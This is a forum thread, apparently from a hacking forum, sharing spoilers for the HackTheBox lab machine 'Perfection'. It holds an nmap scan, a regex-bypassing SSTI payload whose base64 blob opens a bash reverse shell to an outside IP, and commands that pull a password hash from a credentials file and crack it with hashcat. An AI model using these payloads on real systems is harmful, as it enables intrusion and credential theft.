Possibly Related Threads…

Art10n · Mar 02, 2024, 05:17 PM

Perfection
Linux · Easy
https://app.hackthebox.com/machines/590

Art10n · Mar 02, 2024, 07:12 PM

PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.9p1 Ubuntu 3ubuntu0.6 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 256 80e479e85928df952dad574a4604ea70 (ECDSA)
|_ 256 e9ea0c1d8613ed95a9d00bc822e4cfe9 (ED25519)
80/tcp open http nginx
|_http-title: Weighted Grade Calculator
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Server: WEBrick/1.7.0 (Ruby/3.0.2/2021-07-07)

https://www.exploit-db.com/exploits/5215

chillywilly · Mar 02, 2024, 07:32 PM

those are are old shit, attack the calculator

dalecooper · Mar 02, 2024, 08:01 PM

fuzzed all special characters & url encoding.. all banned besides url encoded numbers
maybe look into sinatra?

a44857437 · Mar 02, 2024, 08:02 PM

Only thing I noticed is that the calculator first adds up all the numbers, and only when they add up to 100, it will check the input (and return the dreaded 'Malicious input detected')

jahman · Mar 02, 2024, 08:05 PM

You have to bypass a regex filter to execute SSTI RCE. You have to use the %0A char. here is a payload:

category1=a///A77ss/e%0A;<%25%3d+system("echo IyEvYmluL2Jhc2gK

YmFzaCAgLWMgImJhc2ggLWkgPiYgL2Rldi90Y3AvMTAuMTAuMTQuMTIxLzIyMjIgMD4mMSIK | base64 -d | bash")+%25>+

Then you have to find the susan hash password in the /home/susan/Migration/pupilpath_credentials.db file

strings /home/susan/Migration/pupilpath_credentials.db

The format of the password is in the /var/spool/mail/susan. You can crack it with hashcazt in mask mode:

hashcat -m 1400 h -a 3 susan_nasus_?d?d?d?d?d?d?d?d?d

DoesntMatter123456 · Mar 02, 2024, 08:47 PM

Thanks for the payload.I am trying this by changing I.P and Port but still unable to get reverse shell. Any idea what can I be doing wrong

a44857437 · Mar 02, 2024, 09:07 PM

(Mar 02, 2024, 08:05 PM)jahman Wrote: You have to bypass a regex filter to execute SSTI RCE. You have to use the %0A char. here is a payload:

category1=a///A77ss/e%0A;<%25%3d+system("echo IyEvYmluL2Jhc2gK YmFzaCAgLWMgImJhc2ggLWkgPiYgL2Rldi90Y3AvMTAuMTAuMTQuMTIxLzIyMjIgMD4mMSIK | base64 -d | bash")+%25>+

Then you have to find the susan hash password in the /home/susan/Migration/pupilpath_credentials.db file

strings /home/susan/Migration/pupilpath_credentials.db

The format of the password is in the /var/spool/mail/susan. You can crack it with hashcazt in mask mode:

hashcat -m 1400 h -a 3 susan_nasus_?d?d?d?d?d?d?d?d?d

How did you find that password pattern? Guessed it?

peRd1 · Mar 02, 2024, 09:54 PM

Check mail in /var/mail/susan for pass pattern.

TuuuDs · (This post was last modified: Mar 02, 2024, 11:02 PM by TuuuDs.)

For root:

$ su - su

$ sudo su

$ cat /root/root.txt

Possibly Related Threads…
Thread		Author	Replies	Views	Last Post
	Hack the box Pro Labs, VIP, VIP+ 1 month free Method	RedBlock	23	2,189	2 hours ago Last Post: kkkato
	[FREE] HackTheBox Academy - CBBH CDSA CPTS All Modules Flags	Techtom	20	2,495	Yesterday, 11:06 PM Last Post: op334
	[FREE] HackTheBox All Cheatsheets	Tamarisk	3	398	Yesterday, 10:36 PM Last Post: op334
	[FREE] 300+ Writeups PDF HackTheBox/HTB premium retired	Tamarisk	369	92,015	Yesterday, 04:10 PM Last Post: sabbyahmed
	CBBH Write Ups	hiddenhacker	22	6,229	Yesterday, 06:39 AM Last Post: Usercomplex